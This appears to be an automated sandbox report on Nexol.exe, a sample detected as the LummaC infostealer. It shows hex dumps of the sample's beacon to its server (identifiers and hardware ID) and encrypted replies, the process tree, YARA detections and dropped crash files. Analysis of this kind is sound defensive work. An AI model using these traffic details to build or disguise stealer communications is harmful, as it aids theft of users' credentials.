2025-03-11 23:00:12 UTC	103	OUT	Data Raw: 75 69 64 3d 37 65 31 66 62 63 32 38 35 30 34 33 64 32 33 62 61 32 65 33 31 34 66 34 66 66 38 30 62 63 36 64 61 37 39 66 39 36 61 61 35 64 34 62 38 65 61 31 33 62 31 39 37 39 34 30 26 63 69 64 3d 26 68 77 69 64 3d 45 41 37 33 46 38 39 43 46 41 39 31 39 39 34 31 37 41 36 34 33 44 39 43 32 33 39 36 45 37 35 44 Data Ascii: uid=7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940&cid=&hwid=EA73F89CFA9199417A643D9C2396E75D
2025-03-11 23:00:13 UTC	784	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 23:00:12 GMT Content-Type: application/octet-stream Content-Length: 10517 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WXBWhwD9x7TQeWwXKCZzbgUvXLFjuEpjRQl5hN%2B1XruNgj5ysLvB3mEBzPvoqLW4MWefCYx1Yul64SMy4a6E4E8p9KNsNHOXyRGjSNUJJqoQ4e9ONYPakya4Qvoke9D4%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91eeaaaa6bae0947-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24240&min_rtt=20869&rtt_var=8675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1004&delivery_rate=99789&cwnd=208&unsent_bytes=0&cid=706f237d47b045a9&ts=911&x=0"
2025-03-11 23:00:13 UTC	585	IN	Data Raw: 9b f2 f4 cc 3a 2c f7 d8 4e a3 e6 f8 96 9d 46 87 73 7e df 00 12 b0 94 ac 37 81 99 1e 5e dd 12 4c ce 5e a8 df c3 0f e4 18 0a 6b 30 61 f4 cb 26 54 e7 49 a3 3a f2 32 c0 97 39 37 8b ac 84 f4 cb 57 41 08 df 3e dc 37 87 72 12 8c ce d9 f9 1c 29 71 9a 2d b1 b2 98 e0 6b b5 fc f0 d8 5b d1 ad 7c 93 78 ab fa 55 08 fe c9 70 a9 12 2c ba e5 07 13 ca d5 06 91 ac 06 ca db 98 c2 6a d5 aa 92 1a cb cd 85 ef 83 83 7c 1e e8 2c 6c 46 c0 10 b8 85 5d 57 17 7c a3 d1 0a 7c 9c 24 0a d0 63 9d c8 d5 b1 bb 38 7d b4 09 06 5d a0 2c b9 4a 6d a6 d6 55 82 de f8 46 4e 5a 37 9f 60 aa 29 83 9f d5 ff 6f 3a 92 57 55 e4 5d fa 43 50 62 25 41 10 d3 45 d9 48 be cb fa fd db 13 e6 e6 42 53 3e 4f b9 c6 e0 d0 6e e8 66 61 b7 26 d2 02 99 f1 a6 87 4d 53 32 3a a1 b9 24 61 88 96 64 d8 d1 cf 3a 95 4e fc 0d fe Data Ascii: :,NFs~7^L^k0a&TI:297WA>7r)q-k[\|xUp,j\|,lF]W\|\|$c8}],JmUFNZ7`)o:WU]CPb%AEHBS>Onfa&MS2:$ad:N
2025-03-11 23:00:13 UTC	1369	IN	Data Raw: d1 34 64 78 26 74 37 29 d9 c3 9a 8e 34 be d5 88 81 19 91 b4 c7 b2 3a 3e 79 9a da d4 f6 33 53 9c fd 59 29 39 46 9b b6 46 b5 2a 8f f1 7e 41 db 87 8f 9e a1 cc 8e de 78 8d 42 29 9d 34 47 32 bd 77 9d ec 0a 91 85 0f 28 87 14 90 36 cd e8 bc d0 d5 b3 c5 3c 35 8c 93 f8 cd e4 7f cf ce 7d 74 bf a0 58 75 21 95 9a 0e 5c e6 94 03 12 7d e8 77 40 d2 15 8b a8 f4 62 c0 bf 24 3a ec 4b 6d 6d 36 d9 2a b5 ce 0f 78 a3 b1 51 99 e2 98 e7 76 8a d7 f2 79 2b e6 9f e4 da 42 73 d5 0c 4a 03 c1 a4 3b 5f 90 74 0e 3b a9 1b 75 96 89 8f d2 1b 65 88 9b 3f 5e 93 5c 85 9e 73 1d 5f 79 ef 05 43 f2 0d 76 10 5f 53 1f 4f 16 fa 64 78 b3 fb 9b 86 e3 a2 b5 79 88 bc 6c 8d 99 02 60 f9 cd 3c 48 ee f3 b1 ac 76 16 f9 1f af b5 03 3d 0d 3e ba 69 c8 8b 1b 06 5b e0 9d 0b 81 e5 8b 53 2e f3 52 52 6a 3f f8 94 55 Data Ascii: 4dx&t7)4:>y3SY)9FF~AxB)4G2w(6<5}tXu!\}w@b$:Kmm6xQvy+BsJ;_t;ue?^\s_yCv_SOdxyl`<Hv=>i[S.RRj?U
2025-03-11 23:00:13 UTC	1369	IN	Data Raw: 2a c0 46 8c 51 16 a5 85 26 e3 ab b6 cd 41 a9 b8 c1 e4 b0 f0 97 f4 b0 57 81 cb 35 38 c7 72 a0 88 a9 de 52 6d 03 7f 1c ce a7 a7 38 e1 5e cf 73 26 f6 c8 ae 04 9a 19 f1 50 05 16 26 fc 4d 18 16 1a 4c dc 87 c7 84 5b 21 d1 76 c8 d1 2b 45 28 2a 74 5a 56 ff 22 d4 0c 95 10 c4 b9 77 9a 85 27 18 1d e8 12 78 4e 02 c7 d8 f1 74 0c c4 2b 4d 3e 1d 44 d6 97 a9 a1 d9 b0 3b 9d e2 d5 ed b8 e8 54 73 ea 88 36 e7 bc d0 87 1e 5e 21 f4 c2 dc 66 fe 8d f3 ba aa f9 f2 a4 7a 6a 71 d3 c7 69 9f 9b 94 ce 57 db 12 bd e7 19 7f e7 fc 48 89 6c bc 7c d4 79 38 6d 4a c8 ca 2d 44 20 c1 46 e9 79 73 aa d1 f2 e7 7a 03 75 1d d8 bc af e4 8c ef 51 79 06 95 53 51 7d b9 39 0c b9 a9 e3 1e d8 09 71 a2 c1 bb 6b ef 39 32 83 78 7d 52 2a bf 15 cb ff 9a ca c8 b4 9c d2 50 6e 27 54 ef 66 13 a6 61 c1 91 61 2f 54 Data Ascii: FQ&AW58rRm8^s&P&ML[!v+E(tZV"w'xNt+M>D;Ts6^!fzjqiWHl\|y8mJ-D FyszuQySQ}9qk92x}R*Pn'Tfaa/T
2025-03-11 23:00:13 UTC	1369	IN	Data Raw: 98 21 aa 4e ab 91 7e 5a 03 5f ae 50 75 5d bd ce d5 c2 10 49 9b fd ba b5 21 44 35 59 82 0b 94 1c 79 17 5b 13 71 cd 57 5d 81 ac 8f c4 b7 82 2e 93 16 a0 c4 57 ad 33 32 93 8d 89 61 2a 66 40 b5 c0 4d 79 8a 80 3f c6 89 43 a6 10 44 64 2e 62 f8 63 84 9a 60 bf ef b6 38 6a 0b 28 36 aa 9b 4b 73 67 1c 66 5a 84 7b 88 28 f5 8b 4d da 2f 95 27 bb e1 67 88 57 04 0a 8e 2e 64 ed de ff 74 fd 84 00 d6 67 61 d7 9e ce 09 0e 27 81 d3 f5 d0 06 77 25 25 ec 83 6c dc 7a c7 e3 f3 04 4d 2f 62 48 12 46 e3 16 2a be 7e 27 29 4d 3c f9 69 0d ca 1b 85 62 17 fd df d9 d3 f4 34 61 66 a3 3f 76 34 d3 fc bc ce 6c 99 2e eb 93 ee 84 51 72 f2 46 13 9c 64 c9 a8 fd ab 75 5c eb 40 71 35 83 d0 7c cf aa 53 c1 a8 c1 92 dd 6d 75 14 a6 e8 25 81 34 40 c3 4a 18 d6 c7 b3 62 1a 9a 06 46 e6 22 6b bc 92 91 ec 0f Data Ascii: !N~Z_Pu]I!D5Yy[qW].W32af@My?CDd.bc`8j(6KsgfZ{(M/'gW.dtga'w%%lzM/bHF~')M<ib4af?v4l.QrFdu\@q5\|Smu%4@JbF"k
2025-03-11 23:00:13 UTC	1369	IN	Data Raw: 81 4a fe 51 fc b7 ea d4 ee 1e c1 16 f0 e0 a7 45 57 d3 12 f6 ba cd 45 13 57 00 da 33 53 bf 8a f3 e2 a5 5b 12 17 29 39 fe 10 94 53 08 da 14 ca cd 9b 46 6a 83 fa 9c 1c fa 1b 74 b6 ad 63 2b f4 20 29 f8 76 00 44 ee 14 ae 00 05 0b 19 6c ef ac 9d b6 af 61 10 97 ef 4a 93 f7 7d 1c b4 a0 df ba 9f 7d 04 56 c0 41 27 d5 96 7f 3c b5 7e 8d cf b7 12 17 94 69 37 4e 58 5f b8 c2 73 88 27 b2 f9 3a a7 9d 9d 37 59 8b b1 0a bc fd e0 74 cf f5 1b f6 cf 4f 4e 6c b0 f2 37 a6 78 86 fd 22 b0 1a 16 8d 03 3e 7a 1c a7 e4 59 57 7d 8c 99 b5 f2 02 c6 0f 7d 0c 2c a9 e4 12 64 93 4e 43 c6 08 da da 40 da 82 56 98 45 90 30 81 b4 ff 54 08 71 17 0c 6d a7 5c 57 00 13 31 3c 90 8d 90 0b 1e 5f 83 37 97 f5 ab 9d b0 34 54 8f d1 81 bc b1 79 f5 13 b1 db 5e f2 07 7e 12 a9 93 04 75 c6 14 c5 b0 da 2e 55 7d Data Ascii: JQEWEW3S[)9SFjtc+ )vDlaJ}}VA'<~i7NX_s':7YtONl7x">zYW}},dNC@VE0Tqm\W1<_74Ty^~u.U}
2025-03-11 23:00:13 UTC	1369	IN	Data Raw: 8d 09 e8 cf d5 be eb f7 9e 70 3f ff f3 1e 8b b7 79 df c3 db 0e 30 73 2d da 84 9e 3b a0 01 d9 10 5f eb 34 40 e0 64 bd 1f 74 5d 62 b9 c5 5e ba 50 36 e4 de 8c 23 fd 55 ab 5e 66 85 72 49 a2 7f 0d c1 2c 1c cd 44 72 6f 2c 34 df 7a 53 20 d8 cf a7 fd 69 f3 07 d7 50 3e 51 6c c9 f2 5b 3b bf 7e 2b d1 90 25 c8 d3 8b 2c b5 30 3e 1f ce 53 ec 25 21 ee b5 d4 b8 92 30 9f a3 df 00 3f 08 96 9f b4 14 f8 c3 c5 6d b0 f7 06 bf 94 61 2e 05 b2 3d d1 30 de 3f 7d bf d6 b2 0a 8a d9 62 d2 44 e0 73 d7 4f 0d e8 63 78 5e 6b dc d3 43 f8 89 1c 4b 46 ac d7 43 e7 d8 a5 6a 19 26 9b b8 d7 dc b5 2f 3c 09 02 d2 06 1f ee 1e 0a 64 79 48 69 04 e6 e5 b3 8a 68 fe 81 c4 03 23 08 d3 d3 11 91 d9 fe 99 56 a9 cd 5c f2 f1 f1 57 b8 73 9a 80 19 82 b3 3f 6e 85 1f 46 12 34 46 e6 c5 ba 1e a2 5d 93 23 ff d2 1b Data Ascii: p?y0s-;_4@dt]b^P6#U^frI,Dro,4zS iP>Ql[;~+%,0>S%!0?ma.=0?}bDsOcx^kCKFCj&/<dyHih#V\Ws?nF4F]#
2025-03-11 23:00:13 UTC	1369	IN	Data Raw: 86 cc b6 31 3a 3e e9 7e 56 82 07 92 08 24 d7 c8 31 9f bc a5 97 c9 67 e5 6f 84 5a d4 85 c4 d6 5a 59 82 3f 57 89 29 3b d3 cb 8d 08 d0 35 a1 16 c4 a0 30 07 13 53 52 bb ee 3a 60 53 98 56 63 e9 13 d4 96 95 d3 61 da 18 c4 f9 00 14 e8 8b 30 f3 2e 03 58 99 1e b8 5c ee e8 78 2c 41 81 05 7e 4c 50 46 c4 23 a4 1a f0 b4 b5 40 9b 42 15 9f e2 a4 85 7e b7 03 31 90 bd ef 04 62 e3 49 0d 8c 5a 5f 0c 78 67 c2 39 1b e3 0f 92 e6 06 a1 79 80 de 1c 33 04 6d 16 eb d6 78 f9 d6 c1 f2 cb ca 6f 5c 83 8c d8 92 14 9a 96 42 14 4b 3e b6 7c 73 cf 76 79 71 83 ae 84 af 3a a9 07 bd a3 e2 7c 39 45 07 79 aa db 53 f7 4d f3 97 4e fa 7f fe 03 3f e7 eb c6 6f b4 11 48 51 33 e9 c1 14 38 78 36 62 55 9e 00 98 39 f0 6d ad c7 f5 2d c3 1d c2 17 e7 d0 66 f5 2e 85 f7 52 3c e2 4e 54 e3 1b fb db e0 3d cd 22 Data Ascii: 1:>~V$1goZZY?W);50SR:`SVca0.X\x,A~LPF#@B~1bIZ_xg9y3mxo\BK>\|svyq:\|9EySMN?oHQ38x6bU9m-f.R<NT="
2025-03-11 23:00:13 UTC	1369	IN	Data Raw: cf 5e 03 38 60 f7 50 0f e6 9d 01 30 2c 5c 82 5a ea 0a 3d 32 62 05 40 cb a9 2b 69 c7 76 37 90 3b a0 f3 26 47 34 de 78 8e 60 de be f2 5d 63 94 29 2a d0 a8 b5 43 4e 04 6e b1 31 26 56 01 89 42 42 03 b9 16 b7 cb 64 c0 ea a8 f2 e8 b8 6c c2 7c c7 6c 8f cd 54 35 dd e5 8e 3f ae e2 af d8 36 fb b0 99 4f 02 7d 7d 2d f8 0b c4 9f 1e b1 4d 23 2f 9e 28 b6 60 73 86 89 e6 2b 9f 4c 18 f1 69 cc 0e 60 a7 bd 09 2b be 88 e1 9b 45 8c 57 fb 24 a1 9c 01 be 92 d8 5e 93 95 26 6a 71 9a 69 47 a9 40 34 36 e7 03 94 d4 9a 63 b8 d0 82 d4 94 0b 82 69 a1 07 b1 49 6b 34 74 1b 69 ac 35 a6 9c 88 cf 27 29 24 0b 96 ce 35 7f 85 54 cd b3 53 e7 26 a7 55 d5 29 0e 14 28 d7 ee 0c 81 ef ec 1e 7e c9 ff 93 4b 1b f6 a3 cb 18 56 24 db bf b0 6e 12 10 ec 09 c0 66 25 eb 55 21 0a d9 a0 73 48 56 37 b3 66 ec d4 Data Ascii: ^8`P0,\Z=2b@+iv7;&G4x`]c)*CNn1&VBBdl\|lT5?6O}}-M#/(`s+Li`+EW$^&jqiG@46ciIk4ti5')$5TS&U)(~KV$nf%U!sHV7f
2025-03-11 23:00:13 UTC	349	IN	Data Raw: 5a 95 19 a8 63 48 11 a4 ed 8b 1d 59 fd 01 cf 41 c9 5a ee 49 fd 32 39 e1 87 00 68 51 ca 33 5c fa 8d 22 bf 7d d4 a1 98 37 57 32 82 54 d4 67 c3 63 21 fc 14 8f 69 9e 2f 57 67 b0 37 0e f2 3d a5 77 3b d2 47 ea c9 ed 33 e4 ef c5 7c 1f 9a 9c 73 1e 9f 10 de f4 77 5d 26 a2 32 11 fd 22 a7 ac d7 9c 89 48 8e f1 03 0f 43 60 a1 b2 de fe e9 3a b6 85 50 ca b4 4a a9 f5 b0 25 d7 48 b4 61 51 27 90 d5 01 93 a7 4d 51 5e 35 46 1b 12 49 fd 32 7c a6 a3 f8 67 73 7f a0 95 3e 17 60 78 31 26 74 47 58 0a 5a d0 3e 42 11 2c 60 a5 5a 16 98 cb 9f fc 01 f6 15 5e 11 62 54 03 64 47 00 6c be e4 e8 7c a3 97 4a 51 fe f0 eb 00 47 a0 be 01 67 19 a3 85 78 91 72 68 51 84 3b 18 d9 bd a2 e0 be 63 b2 7c 8f 66 a1 fe 84 6a f0 ab 51 87 ce 31 a8 d3 ad 15 50 21 7e 94 12 61 5d a6 f7 5f b2 37 ef e4 9a 41 50 Data Ascii: ZcHYAZI29hQ3\"}7W2Tgc!i/Wg7=w;G3\|sw]&2"HC`:PJ%HaQ'MQ^5FI2\|gs>`x1&tGXZ>B,`Z^bTdGl\|JQGgxrhQ;c\|fjQ1P!~a]_7AP

Target ID:	5
Start time:	18:59:20
Start date:	11/03/2025
Path:	C:\Users\user\Desktop\Nexol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nexol.exe"
Imagebase:	0x510000
File size:	374'272 bytes
MD5 hash:	0316CD6308D80A13369226B1B4208C64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000005.00000002.1378990712.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:59:21
Start date:	11/03/2025
Path:	C:\Users\user\Desktop\Nexol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nexol.exe"
Imagebase:	0xe10000
File size:	374'272 bytes
MD5 hash:	0316CD6308D80A13369226B1B4208C64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000006.00000002.2542777376.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:59:22
Start date:	11/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 800
Imagebase:	0x110000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Nexol.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Nexol.exe_1129eabdc81cac1ca6b33410e6bea36a32e7d82e_cedd26c6_fe2cbf40-d1af-42e8-965e-1e239c3610de\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER295A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A75.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB4.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
Nexol.exe